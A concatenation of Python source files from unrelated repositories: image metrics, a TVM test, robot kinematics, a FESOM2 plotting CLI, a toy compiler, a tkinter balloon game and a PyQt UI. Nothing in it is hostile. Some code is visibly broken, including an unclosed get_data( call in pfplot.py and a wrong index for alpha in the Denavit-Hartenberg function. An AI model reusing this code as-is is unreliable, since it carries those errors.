tensor_data = tensor_data.detach()
vis = utils.make_grid(tensor_data)
vis = np.array(vis.cpu()).transpose((1,2,0))
if vis.shape[2] == 1:
vis = np.stack([vis, vis, vis], axis=-1)
return vis
def cpt_ssim(img, img_gt, normalize=False):
if normalize:
img = (img - img.min()) / (img.max() - img.min() + 1e-9)
img_gt = (img_gt - img_gt.min()) / (img_gt.max() - img_gt.min() + 1e-9)
SSIM = measure.compare_ssim(img, img_gt, data_range=1.0)
return SSIM
def cpt_psnr(img, img_gt, PIXEL_MAX=1.0, normalize=False):
if normalize:
img = (img - img.min()) / (img.max() - img.min() + 1e-9)
img_gt = (img_gt - img_gt.min()) / (img_gt.max() - img_gt.min() + 1e-9)
mse = np.mean((img - img_gt) ** 2)
psnr = 20 * np.log10(PIXEL_MAX / np.sqrt(mse))
return psnr
def cpt_cos_similarity(img, img_gt, normalize=False):
if normalize:
img = (img - img.min()) / (img.max() - img.min() + 1e-9)
img_gt = (img_gt - img_gt.min()) / (img_gt.max() - img_gt.min() + 1e-9)
cos_dist = np.sum(img*img_gt) / np.sqrt(np.sum(img**2)*np.sum(img_gt**2) + 1e-9)
return cos_dist
def cpt_batch_psnr(img, img_gt, PIXEL_MAX):
mse = torch.mean((img - img_gt) ** 2)
psnr = 20 * torch.log10(PIXEL_MAX / torch.sqrt(mse))
return psnr
def cpt_batch_classification_acc(predicted, target):
# predicted: b x c, logits [-inf, +inf]
pred_idx = torch.argmax(predicted, dim=1).int()
pred_idx = torch.reshape(pred_idx, [-1])
target = torch.reshape(target, [-1])
return torch.mean((pred_idx.int()==target.int()).float())
def normalize(img, mask=None, p_min=0, p_max=0):
# img: h x w, [0, 1], np.float32
if mask is None:
sorted_arr = np.sort(img, axis=None) # sort the flattened array
else:
sorted_arr = np.sort(img[mask == 1], axis=None) # sort the flattened array
n = len(sorted_arr)
img_min = sorted_arr[int(n*p_min)]
img_max = sorted_arr[::-1][int(n*p_max)]
img_norm = (img - img_min) / (img_max - img_min + 1e-6)
return np.clip(img_norm, a_min=0, a_max=1.0)
def get_sub_pxl_values(img, ys, xs):
# img: h x w x c, [0, 1], np.float32
h, w, c = img.shape
xs0, ys0, xs1, ys1 = xs.astype(int), ys.astype(int), xs.astype(int) + 1, ys.astype(int) + 1
xs1 = np.clip(xs1, a_min=0, a_max=w - 1)
ys1 = np.clip(ys1, a_min=0, a_max=h - 1)
dx = (xs - xs0).astype(np.float32)
dy = (ys - ys0).astype(np.float32)
weight_tl = (1.0 - dx) * (1.0 - dy)
weight_tr = (dx) * (1.0 - dy)
weight_bl = (1.0 - dx) * (dy)
weight_br = (dx) * (dy)
weight_tl = np.expand_dims(weight_tl, axis=-1)
weight_tr = np.expand_dims(weight_tr, axis=-1)
weight_bl = np.expand_dims(weight_bl, axis=-1)
weight_br = np.expand_dims(weight_br, axis=-1)
pxl_values = weight_tl * img[ys0, xs0, :] + \
weight_tr * img[ys0, xs1, :] + \
weight_bl * img[ys1, xs0, :] + \
weight_br * img[ys1, xs1, :]
return pxl_values
class VideoWriter:
def __init__(self, fname='./demo.mp4',
h=760, w=1280,
frame_rate=10, bottom_crop=False,
layout='default', display=True):
self.w = int(w)
self.h = int(h)
self.bottom_crop = bottom_crop
self.layout = layout
self.display = display
self.bottom_crop = bottom_crop
self.video_writer = cv2.VideoWriter(
fname, cv2.VideoWriter_fourcc(*'MP4V'), frame_rate,
(self.w, self.h))
def write_frame(self, img_after, img_before=None, idx=None):
if img_after.shape[0] != self.h or img_after.shape[1] != self.w:
img_after = cv2.resize(img_after, (self.w, self.h))
if img_before is not None:
img_before = cv2.resize(img_before, (self.w, self.h))
if self.layout == 'default':
img = img_after
if self.layout == 'transfer':
img = np.zeros_like(img_after)
start_frame_id, end_frame_dx = 20, 40
s = int((idx - start_frame_id) / (end_frame_dx - start_frame_id) * self.w)
s = np.clip(s, a_min=0, a_max=self.w)
img[:, 0:s, :] = img_after[:, 0:s, :]
img[:, s:, :] = img_before[:, s:, :]
frame = img[:,:,::-1]
if self.bottom_crop:
h_crop = int(self.h * 0.9)
frame = cv2.resize(frame[:h_crop, :, :], (self.w, self.h))
self.video_writer.write(frame)
if self.display:
cv2.imshow('frame', frame)
cv2.waitKey(1)
``` |
{
"source": "jiuqi-yang/dev-tvm",
"score": 2
} |
#### File: python/unittest/test_auto_scheduler_compute_dag.py
```python
import tvm, topi
from tvm import auto_scheduler, te
from test_auto_scheduler_common import get_tiled_matmul, matmul_auto_scheduler_test
def test_apply_steps():
dag, s = get_tiled_matmul()
dag.print_python_code_from_state(s)
sch, tensors = dag.apply_steps_from_state(s)
stmt = tvm.lower(sch, tensors, simple_mode=True)
def test_infer_bound():
dag, s = get_tiled_matmul()
s = dag.infer_bound_from_state(s)
def test_estimate_flop():
N = 512
A, B, C = matmul_auto_scheduler_test(N, N, N)
dag = auto_scheduler.ComputeDAG([A, B, C])
assert abs(dag.flop_ct - 2 * N ** 3) < 0.5
D = topi.nn.relu(C)
dag = auto_scheduler.ComputeDAG([A, B, D])
assert abs(dag.flop_ct - 2 * N ** 3 - N * N) < 0.5
# should not count the comparison operations in padding
D = topi.nn.pad(C, [1, 1])
dag = auto_scheduler.ComputeDAG([A, B, D])
assert abs(dag.flop_ct - 2 * N ** 3) < 0.5
if __name__ == "__main__":
test_apply_steps()
test_infer_bound()
test_estimate_flop()
``` |
{
"source": "JiuSenso/robotic-kinamatics-matlab-script",
"score": 3
} |
#### File: planar_robot_kinematics/python_planar_kinematics/planar_robot.py
```python
from numpy import *
from math import atan2
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def rad2deg(a):
if type(a)==int or type(a)==float: return a*(180/pi)
if type(a)==list:
for i in range(0, len(a)): a[i] *= (180/pi)
return a
def deg2rad(a):
if type(a)==int or type(a)==float: return a*(pi/180)
if type(a)==list:
for i in range(0, len(a)): a[i] *= (pi/180)
return a
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def denavit_hartemberg(DH_table_row):
a = DH_table_row[0] # displacement along x axis
alpha = DH_table_row[2] # rotation along x axis
d = DH_table_row[2] # displacement along z axis
theta = DH_table_row[3] # rotation along z axis
# Denavit-Hartemberg transformation matrix
DH = array([ [cos(theta), -sin(theta), 0, a*cos(theta)],
[sin(theta), cos(theta), 0, a*sin(theta)],
[0, 0, 1, d ],
[0, 0, 0, 1 ],
])
return DH
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
class planar_robot:
def __init__(self, link):
self.n = len(link) # joint number
self.l = link # link length
self.q = [] # joint angle
for i in range(0,len(link)):
self.q.append(0.)
self.TOE = [] # Origin to end-effector transformation matrix
def get_end_effector_pos(self):
return [self.TOE[0][3], self.TOE[1][3], self.TOE[2][3]]
def direct_kinematics(self, q):
# params error check
if len(q) != self.n:
return -1
else: self.q= q
a = self.l # displacement along x axis
alpha = zeros(self.n) # rotation along x axis
d = zeros(self.n) # displacement along z axis
theta = deg2rad(q) # rotation along z axis
# build DH table [a, alpha, d, theta]
DH_table = []
for row in range(0,self.n): DH_table.append( [a[row], alpha[row], d[row], theta[row]] )
# Compute Transformation matrices between consecutive frames
A = []
for row in range(0,self.n): A.append(eye(4))
for i in range(0,self.n):
A[i] = denavit_hartemberg(DH_table[i])
# Compute transformation matrix from O to e-e
TOE = I = eye(4) #from origin to end effector
for i in range(0,self.n) : TOE = TOE @ A[i]
for i in range(0,4):
for j in range(0,4):
TOE[i][j] = round(TOE[i][j], 3)
self.TOE = TOE
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def RR_inverse_kinematics(self, p):
px = p[0]
py = p[1]
#pz = p[2]
if (px*px + py*py) >= (self.l[0]*self.l[0] + self.l[1]*self.l[1] + 2*self.l[0]*self.l[1]):
return -1
c2 = (px*px + py*py - self.l[0]*self.l[0] - self.l[1]*self.l[1]) / (2*self.l[0]*self.l[1])
s2_pos = sqrt(1 - c2*c2)
s2_neg = -sqrt(1 - c2*c2)
q2_pos = atan2(s2_pos, c2)
q1_pos = atan2( py*(self.l[0]+self.l[1]*c2) - px*self.l[1]*s2_pos , px*(self.l[0]+self.l[1]*c2) + py*self.l[1]*s2_pos )
q2_neg = atan2(s2_neg, c2)
q1_neg = atan2( py*(self.l[0]+self.l[1]*c2) - px*self.l[1]*s2_neg , px*(self.l[0]+self.l[1]*c2) + py*self.l[1]*s2_neg )
return [[round(rad2deg(q1_pos),4), round(rad2deg(q2_pos),4)], [round(rad2deg(q1_neg),4), round(rad2deg(q2_neg),4)] ]
``` |
{
"source": "JiuShiNewBee/mypyfesom2",
"score": 3
} |
#### File: newver_202009/pyfesom2/pfplot.py
```python
import argparse
import cmocean.cm as cmo
import matplotlib.pylab as plt
import numpy as np
from .load_mesh_data import get_data, load_mesh
from .pfinterp import parse_depths, parse_timesteps, parse_years
# import matplotlib as mpl
# mpl.use('Qt5Agg')
from .plotting import plot
def pfplot():
parser = argparse.ArgumentParser(
prog="pfplot", description="Plot FESOM2 data on the map."
)
parser.add_argument("meshpath", help="Path to the mesh folder")
parser.add_argument("result_path", help="Path to the results")
parser.add_argument(
"variable", default="temp", help="Name of the variable inside the file"
)
parser.add_argument(
"--years",
"-y",
default="1948",
type=str,
help="Years as a string. Options are one year, coma separated years, or range in a form of 1948:2000.",
)
parser.add_argument("--depth", "-d", default=0, type=float, help="Depth in meters.")
parser.add_argument(
"--box",
"-b",
nargs=4,
type=float,
default=[-180.0, 180.0, -80.0, 90.0],
help="Map boundaries in -180 180 -90 90 format that will be used for interpolation.",
metavar=("LONMIN", "LONMAX", "LATMIN", "LATMAX"),
)
parser.add_argument(
"--res",
"-r",
nargs=2,
type=int,
default=(360, 170),
help="Number of points along each axis that will be used for interpolation (for lon and lat).",
metavar=("N_POINTS_LON", "N_POINTS_LAT"),
)
parser.add_argument(
"--influence",
"-i",
default=80000,
type=float,
help="Radius of influence for interpolation, in meters.",
)
parser.add_argument(
"--timestep",
"-t",
default=0,
type=int,
help="Index of the timstep from netCDF variable, strats with 0.",
)
parser.add_argument(
"--levels",
"-l",
nargs=3,
type=float,
help="Levels for contour plot in format min max numberOfLevels.\
If not provided min/max values from data will be used with 40 levels.",
metavar=("START", "STOP", "NUMBER"),
)
parser.add_argument(
"--quiet",
"-q",
action="store_true",
help="If present additional information will not be printed.",
)
parser.add_argument(
"--ofile",
"-o",
type=str,
help="Path to the output figure. If present the image\
will be saved to the file instead of showing it. ",
)
parser.add_argument(
"--mapproj",
"-m",
choices=["merc", "pc", "np", "sp", "rob"],
default="rob",
help="Map projection. Options are Mercator (merc), Plate Carree (pc), North Polar Stereo (np), South Polar Stereo (sp), Robinson (rob)",
)
parser.add_argument(
"--abg",
nargs=3,
type=float,
default=(0.0, 0.0, 0.0),
help="Alpha, beta and gamma Euler angles. If you plots look rotated, you use wrong abg values. Usually nessesary only during the first use of the mesh.",
)
parser.add_argument(
"--cmap",
default="Spectral_r",
help="Name of the colormap from cmocean package or from the standard matplotlib set. By default `Spectral_r` will be used for property plots and `balance` for bias plots.",
)
parser.add_argument(
"--interp",
choices=["nn", "idist", "linear", "cubic"],
default="nn",
help="Interpolation method. Options are nn - nearest neighbor (KDTree implementation, fast), idist - inverse distance (KDTree implementation, decent speed), linear (scipy implementation, slow) and cubic (scipy implementation, slowest and give strange results on corarse meshes).",
)
parser.add_argument(
"--ptype",
choices=["cf", "pcm"],
default="cf",
help="Plot type. Options are contourf ('cf') and pcolormesh ('pcm')",
)
parser.add_argument(
"-k",
type=int,
default=5,
help="k-th nearest neighbors to use. Only used when interpolation method (--interp) is idist",
)
args = parser.parse_args()
# args.func(args)
if not args.quiet:
print("Mesh path: {}".format(args.meshpath))
print("Input file path: {}".format(args.result_path))
print("Name of the variable: {}".format(args.variable))
print("Years: {}".format(args.years))
print("Depth: {}".format(args.depth))
print("Bounding box: {}".format(args.box))
print("Number of points along sides: {}".format(args.res))
print("Radius of influence (in m.): {}".format(args.influence))
print("Nearest neighbors to use: {}".format(args.k))
print("Timestep index: {}".format(args.timestep))
print("Contour plot levels: {}".format(args.levels))
print("Quiet?: {}".format(args.quiet))
print("Output file for image: {}".format(args.ofile))
print("Map projection: {}".format(args.mapproj))
print("Euler angles of mesh rotation: {}".format(args.abg))
# print("File with climatology: {}".format(args.clim))
print("Name of the color map: {}".format(args.cmap))
print("Interpolation method: {}".format(args.interp))
print("Plot type: {}".format(args.ptype))
print(args.cmap)
if args.cmap:
colormap = args.cmap
else:
colormap = "Spectral_r"
mesh = load_mesh(args.meshpath, abg=args.abg, usepickle=True, usejoblib=False)
years = parse_years(args.years)
data = get_data(
result_path=args.result_path,
variable=args.variable,
years=years,
mesh=mesh,
runid="fesom",
records=-1,
depth=float(args.depth),
how="mean",
ncfile=None,
compute=True,
fig = plot(
mesh=mesh,
data=data,
cmap=colormap,
influence=args.influence,
box=args.box,
res=args.res,
interp=args.interp,
mapproj=args.mapproj,
levels=args.levels,
ptype=args.ptype,
units=None,
figsize=(10, 5),
rowscol=(1, 1),
titles=None,
distances_path=None,
inds_path=None,
qhull_path=None,
basepath=None,
)
plt.show()
if __name__ == "__main__":
pfplot()
``` |
{
"source": "Jiusoft/cpc",
"score": 3
} |
#### File: Jiusoft/cpc/main.py
```python
import sys
import os
from shutil import rmtree
from subprocess import Popen
args = sys.argv[1:]
def escape(string):
toreturn=""
for char in string:
if char=="\"" or char=="(" or char==")":
char=f"\\{char}"
toreturn+=char
else:
toreturn+=char
return toreturn
def shell():
while True:
cmd=input(">>> ")
os.system(f"py {escape(toPython(cmd))}")
def compile():
filename = args[0].split("/")[-1].split(".")[0]
with open(filename + ".py", 'a+') as f:
f.write(
"import socket\nimport os\nimport math\nimport sys\nhostname=socket.gethostname("
")\nhostip=socket.gethostbyname(hostname)\n")
with open(args[0], 'r') as f:
for line in f.readlines():
toAppend = toPython(line)
with open(filename + ".py", 'a') as nf:
nf.write(toAppend + "\n")
compiletoSystem = Popen(["python3", "-m", "PyInstaller", filename + ".py", "--onefile", "--distpath", "."])
compiletoSystem.wait()
rmtree("build")
os.remove(filename + ".spec")
os.remove(filename + ".py")
def checkindent(code, indent=0):
if code.startswith(" "):
indent += 1
code = code[1:]
if code.startswith(" "):
checkindent(code, indent=indent)
else:
return indent
def toPython(code):
if code == "\n":
return "\n"
elif code.startswith("#addmod "):
try:
if code.split(" ")[1] == "libguimod\n":
return "import tkinter as tk"
else:
return 'print(\"ERROR: No such module!\")'
except IndexError:
return 'print(\"ERROR: Syntax for adding module is \\"#addmod MODULE\\"\"'
else:
if checkindent(code) is None:
indent = 0
else:
indent = checkindent(code)
to_return = ""
tmp = list(code)
tmp1 = []
for item in tmp:
if item != "\\":
tmp1.append(item)
else:
tmp1.append("escape")
for item in tmp1:
if item == "escape":
i = tmp1.index(item)
del tmp1[i]
del tmp1[i]
command_list = "".join(tmp1).split()
main = command_list[0]
del tmp, tmp1
if main == "putln":
to_return = "print(" + " ".join(command_list[1:]) + ")"
if main == "getinput":
to_return = "inputresult = input(" + " ".join(command_list[1:]) + ")"
if "=" in command_list:
to_return = " ".join(command_list)
if main == "IF":
if not command_list[-1] == "THEN":
to_return = 'print(\"ERROR: \\"THEN\\" expected\")'
else:
condition = command_list[1:-1]
if len(condition) != 3 or not (condition[1] in ["<", "<=", "==", ">=", ">"]):
to_return = 'print(\"ERROR: If then condition syntax must be: \\"IF <var> </<=/==/>=/> <var> ' \
'THEN\\"\")'
else:
to_return = 'if ' + " ".join(condition) + ":"
if main == "ELSE":
to_return = "else:"
for i in range(indent):
to_return = "\t" + to_return
return to_return
if len(args)==0:
shell()
elif len(args)==1:
compile()
else:
print("Sorry, but cpc can only handle one argument at this moment. ")
``` |
{
"source": "Jiusoft/tkinter-balloon-game",
"score": 3
} |
#### File: Jiusoft/tkinter-balloon-game/main.py
```python
import tkinter as tk
from random import randint
from time import sleep
from threading import Thread
from playsound import playsound
root = tk.Tk()
root.wm_title('Balloon game - Jiusoft')
fullscreen = False
def enter_fullscreen():
global fullscreen
fullscreen = True
fullscreen_button['text'] = 'Exit fullscreen'
root.attributes('-fullscreen', True)
def exit_fullscreen():
global fullscreen
fullscreen = False
fullscreen_button['text'] = 'Enter fullscreeen'
root.attributes('-fullscreen', False)
def enter_or_exit_fullscreen():
if fullscreen:
exit_fullscreen()
elif not fullscreen:
enter_fullscreen()
fullscreen_button = tk.Button(master=root, text='', command=enter_or_exit_fullscreen)
fullscreen_button.pack(side=tk.RIGHT, anchor=tk.NE)
enter_fullscreen()
score_label = tk.Label(master=root, text='Score: 0')
def set_score(score: int):
score_label['text'] = f'Score: {score}'
score_label.pack(side=tk.TOP, fill=tk.X)
play_area = tk.Canvas(master=root, bg='snow', width=750, height=750)
play_area.pack(side=tk.TOP)
score = 0
def increase_score(evt):
global score
score += 1
set_score(score)
def play_pop():
playsound('Pop.mp3', True)
Thread(target=play_pop).start()
def create_rectangle_in_random_spot():
previous_rectangle = None
try:
for _ in range(20):
if previous_rectangle is not None:
play_area.delete(previous_rectangle)
base = randint(0, 600)
rectangle = play_area.create_rectangle(base, base + 50, base + 100, base + 150, fill='red',
outline='red')
play_area.tag_bind(rectangle, '<Button-1>', increase_score)
previous_rectangle = rectangle
sleep(1.5)
for _ in range(30):
play_area.delete(previous_rectangle)
base = randint(0, 600)
rectangle = play_area.create_rectangle(base, base + 50, base + 100, base + 150, fill='red',
outline='red')
play_area.tag_bind(rectangle, '<Button-1>', increase_score)
previous_rectangle = rectangle
sleep(1)
while True:
play_area.delete(previous_rectangle)
base = randint(0, 600)
rectangle = play_area.create_rectangle(base, base + 50, base + 100, base + 150, fill='red',
outline='red')
play_area.tag_bind(rectangle, '<Button-1>', increase_score)
previous_rectangle = rectangle
sleep(0.5)
except RuntimeError:
pass
Thread(target=create_rectangle_in_random_spot).start()
root.mainloop()
``` |
{
"source": "jiuthree/speaker_recognition",
"score": 3
} |
#### File: jiuthree/speaker_recognition/features.py
```python
import sys
#from python_speech_features import mfcc
import numpy as np
# 换成spafe.features.mfc 库里的 mfcc
from spafe.features.mfcc import mfcc
def get_feature(fs, signal):
num_ceps = 13;
low_freq = 0
high_freq = 2000
nfilts = 24
nfft = 512
dct_type = 2;
use_energy = False;
lifter = 5
normalize = False
mfcc_feature = mfcc(sig=signal,fs= fs, num_ceps=num_ceps, nfilts=nfilts, nfft=nfft, low_freq=low_freq, high_freq=high_freq,
dct_type=dct_type, use_energy=use_energy, lifter=lifter, normalize=normalize)
# mfcc_feature = mfcc(signal, fs)
if len(mfcc_feature) == 0:
print >> sys.stderr, "ERROR.. failed to extract mfcc feature:", len(signal)
return mfcc_feature
``` |
{
"source": "Jiuxe/mancala-league",
"score": 2
} |
#### File: mancala-league/app/league.py
```python
import subprocess
from multiprocessing import Pool
import os
import glob
import logging
import time
from threading import Thread
from functools import reduce
from collections import namedtuple
import pandas as pd
from app.utilities import extract_numbers
from app.constants import *
from datetime import datetime, timedelta
is_running_competition = False
def process_output(p1, p2, output):
""" Return a MatchData object with the match information """
lines = output.split('\n')
digit = -1
for line in lines:
timeout_error = line.endswith('proporcionar una acción.')
connection_error = line.startswith('No hay comunicación')
if timeout_error or connection_error:
digit = extract_numbers(line)[0]
break
if digit == 1:
return [p1, p2, 0, 48, 0, 0, True, False]
elif digit == 2:
return [p1, p2, 48, 0, 0, 0, False, True]
else:
digits = [extract_numbers(line) for line in lines[-7:-1]]
return [p1, p2, digits[0][1], digits[2][1],
digits[1][1], digits[3][1], False, False]
def run_match(p1, p2):
"""
Run a match between p1 and p2.
Returns a MatchData with the relevant data of the match.
"""
p1_name = os.path.basename(p1)
p2_name = os.path.basename(p2)
logging.info('{} vs {}'.format(p1_name, p2_name))
command = MANCALA_COMMAND.format(p1, p2)
res = subprocess.check_output(command, shell=True).decode('utf-8')
match_data = process_output(p1_name, p2_name, res)
return match_data
def create_matches_table(content):
""" Returns a DataFrame based on matches data. """
cols = ['Player 1', 'Player 2', 'Points P1',
'Points P2', 'Time(ms) P1', 'Time(ms) P2',
'Timeouts P1', 'Timeouts P2']
return pd.DataFrame(content, columns=cols)
def create_ranking_table(table):
""" Convert a matches table into a DataFrame with the ranking of bots
based on wins and total points.
"""
tables = []
for a, b in [(1, 2), (2, 1)]:
p1_col = 'Player {}'.format(a)
p2_col = 'Player {}'.format(b)
p1_points_col = 'Points P{}'.format(a)
p2_points_col = 'Points P{}'.format(b)
p1_time_col = 'Time(ms) P{}'.format(a)
p2_time_col = 'Time(ms) P{}'.format(b)
p1_timeouts_col = 'Timeouts P{}'.format(a)
p2_timeouts_col = 'Timeouts P{}'.format(b)
# Extending data for wins, ties and defeats
df = table.set_index(p1_col).drop(
[p2_col, p2_time_col, p2_timeouts_col], axis=1)
df[p1_time_col] /= 1000
df['Wins'] = (df[p1_points_col] > df[p2_points_col]).astype(int)
df['Defeats'] = (df[p1_points_col] < df[p2_points_col]).astype(int)
df['Ties'] = (df[p1_points_col] == df[p2_points_col]).astype(int)
df[p1_timeouts_col] = df[p1_timeouts_col].astype(int)
df = df.groupby(p1_col).sum()
# Renaming columns and index
df.index.names = ['Bot']
df = df.rename(columns={p1_points_col: 'Seeds for',
p2_points_col: 'Seeds against',
p1_time_col: 'Total Time(s)',
p1_timeouts_col: 'Total Timeouts'})
tables.append(df)
# Merge all tables
result = reduce(lambda x, y: x.add(y, fill_value=0), tables)
# Create Points columns based on wins and ties.
result['Points'] = result['Wins'] * 3 + result['Ties']
result = result.reindex(columns=['Points', 'Wins', 'Defeats', 'Ties',
'Seeds for', 'Seeds against',
'Total Timeouts', 'Total Time(s)'])
# Ranking bots
result = result.sort_values(by=['Points', 'Seeds for', 'Total Time(s)'],
ascending=False)
result.index += 1
return result
def run_competition(block_thread=True):
global is_running_competition
if is_running_competition:
return False
def inner():
global is_running_competition
is_running_competition = True
logging.info('Ejecutando competicion')
bot_list = glob.glob('{}/*'.format(BOTS_FOLDER))
match_list = [(p1, p2)
for p1 in bot_list for p2 in bot_list if p1 != p2]
with Pool() as p:
match_data = p.starmap(run_match, match_list)
matches_table = create_matches_table(match_data)
ranking = create_ranking_table(matches_table)
matches_table.set_index(
matches_table.columns[0]).to_csv(MATCHES_CSV)
ranking.to_csv(RANKING_CSV)
is_running_competition = False
logging.info('Competición terminada')
if block_thread:
inner()
else:
Thread(target=inner).start()
return True
def get_current_data():
exec_date = time.ctime((os.stat(RANKING_CSV).st_mtime))
ranking = pd.read_csv(RANKING_CSV)
matches = pd.read_csv(MATCHES_CSV)
return (exec_date, ranking, matches)
def get_next_execution():
now = datetime.now()
lapse = 24 / EXECUTIONS_PER_DAY
next_hour = now + timedelta(hours=lapse - now.hour % lapse)
return next_hour.strftime('%Y-%m-%d %H:00:00')
``` |
{
"source": "jiuya/TrackingCamera",
"score": 2
} |
#### File: TrackingCamera/ball_tracking/ball_tracking_ui.py
```python
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Qt_CV_MainWindow(object):
def setupUi(self, Qt_CV_MainWindow):
Qt_CV_MainWindow.setObjectName(_fromUtf8("Qt_CV_MainWindow"))
Qt_CV_MainWindow.resize(660, 283)
Qt_CV_MainWindow.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
Qt_CV_MainWindow.setLayoutDirection(QtCore.Qt.LeftToRight)
self.centralwidget = QtGui.QWidget(Qt_CV_MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.verticalLayoutWidget = QtGui.QWidget(self.centralwidget)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(20, 90, 501, 141))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout_3 = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout_3.setSizeConstraint(QtGui.QLayout.SetDefaultConstraint)
self.verticalLayout_3.setContentsMargins(-1, 0, -1, -1)
self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
self.label = QtGui.QLabel(self.verticalLayoutWidget)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout_3.addWidget(self.label)
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setSizeConstraint(QtGui.QLayout.SetMinimumSize)
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.label_2 = QtGui.QLabel(self.verticalLayoutWidget)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.horizontalLayout_2.addWidget(self.label_2)
self.H_lcd = QtGui.QLCDNumber(self.verticalLayoutWidget)
self.H_lcd.setObjectName(_fromUtf8("H_lcd"))
self.horizontalLayout_2.addWidget(self.H_lcd)
self.H_edit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.H_edit.setObjectName(_fromUtf8("H_edit"))
self.horizontalLayout_2.addWidget(self.H_edit)
self.H_slider = QtGui.QSlider(self.verticalLayoutWidget)
self.H_slider.setMaximum(180)
self.H_slider.setOrientation(QtCore.Qt.Horizontal)
self.H_slider.setObjectName(_fromUtf8("H_slider"))
self.horizontalLayout_2.addWidget(self.H_slider)
self.verticalLayout_3.addLayout(self.horizontalLayout_2)
self.horizontalLayout_3 = QtGui.QHBoxLayout()
self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
self.label_3 = QtGui.QLabel(self.verticalLayoutWidget)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.horizontalLayout_3.addWidget(self.label_3)
self.S_lcd = QtGui.QLCDNumber(self.verticalLayoutWidget)
self.S_lcd.setObjectName(_fromUtf8("S_lcd"))
self.horizontalLayout_3.addWidget(self.S_lcd)
self.S_edit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.S_edit.setObjectName(_fromUtf8("S_edit"))
self.horizontalLayout_3.addWidget(self.S_edit)
self.S_slider = QtGui.QSlider(self.verticalLayoutWidget)
self.S_slider.setMaximum(61)
self.S_slider.setOrientation(QtCore.Qt.Horizontal)
self.S_slider.setObjectName(_fromUtf8("S_slider"))
self.horizontalLayout_3.addWidget(self.S_slider)
self.verticalLayout_3.addLayout(self.horizontalLayout_3)
self.horizontalLayout_4 = QtGui.QHBoxLayout()
self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
self.label_4 = QtGui.QLabel(self.verticalLayoutWidget)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.horizontalLayout_4.addWidget(self.label_4)
self.V_lcd = QtGui.QLCDNumber(self.verticalLayoutWidget)
self.V_lcd.setObjectName(_fromUtf8("V_lcd"))
self.horizontalLayout_4.addWidget(self.V_lcd)
self.V_edit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.V_edit.setObjectName(_fromUtf8("V_edit"))
self.horizontalLayout_4.addWidget(self.V_edit)
self.V_slider = QtGui.QSlider(self.verticalLayoutWidget)
self.V_slider.setMaximum(254)
self.V_slider.setOrientation(QtCore.Qt.Horizontal)
self.V_slider.setObjectName(_fromUtf8("V_slider"))
self.horizontalLayout_4.addWidget(self.V_slider)
self.verticalLayout_3.addLayout(self.horizontalLayout_4)
self.verticalLayoutWidget_2 = QtGui.QWidget(self.centralwidget)
self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(530, 100, 91, 121))
self.verticalLayoutWidget_2.setObjectName(_fromUtf8("verticalLayoutWidget_2"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget_2)
self.verticalLayout.setSizeConstraint(QtGui.QLayout.SetNoConstraint)
self.verticalLayout.setContentsMargins(-1, 1, -1, 1)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.exec_button = QtGui.QPushButton(self.verticalLayoutWidget_2)
self.exec_button.setMinimumSize(QtCore.QSize(80, 60))
self.exec_button.setObjectName(_fromUtf8("exec_button"))
self.verticalLayout.addWidget(self.exec_button)
self.horizontalLayoutWidget = QtGui.QWidget(self.centralwidget)
self.horizontalLayoutWidget.setGeometry(QtCore.QRect(260, 10, 91, 80))
self.horizontalLayoutWidget.setObjectName(_fromUtf8("horizontalLayoutWidget"))
self.horizontalLayout = QtGui.QHBoxLayout(self.horizontalLayoutWidget)
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.show_button = QtGui.QPushButton(self.horizontalLayoutWidget)
self.show_button.setObjectName(_fromUtf8("show_button"))
self.horizontalLayout.addWidget(self.show_button)
self.verticalLayoutWidget.raise_()
self.verticalLayoutWidget_2.raise_()
self.horizontalLayoutWidget.raise_()
Qt_CV_MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(Qt_CV_MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 660, 24))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menuFile = QtGui.QMenu(self.menubar)
self.menuFile.setObjectName(_fromUtf8("menuFile"))
Qt_CV_MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(Qt_CV_MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
Qt_CV_MainWindow.setStatusBar(self.statusbar)
self.actionQuit = QtGui.QAction(Qt_CV_MainWindow)
self.actionQuit.setObjectName(_fromUtf8("actionQuit"))
self.menuFile.addAction(self.actionQuit)
self.menubar.addAction(self.menuFile.menuAction())
self.retranslateUi(Qt_CV_MainWindow)
QtCore.QObject.connect(self.actionQuit, QtCore.SIGNAL(_fromUtf8("triggered()")), Qt_CV_MainWindow.close)
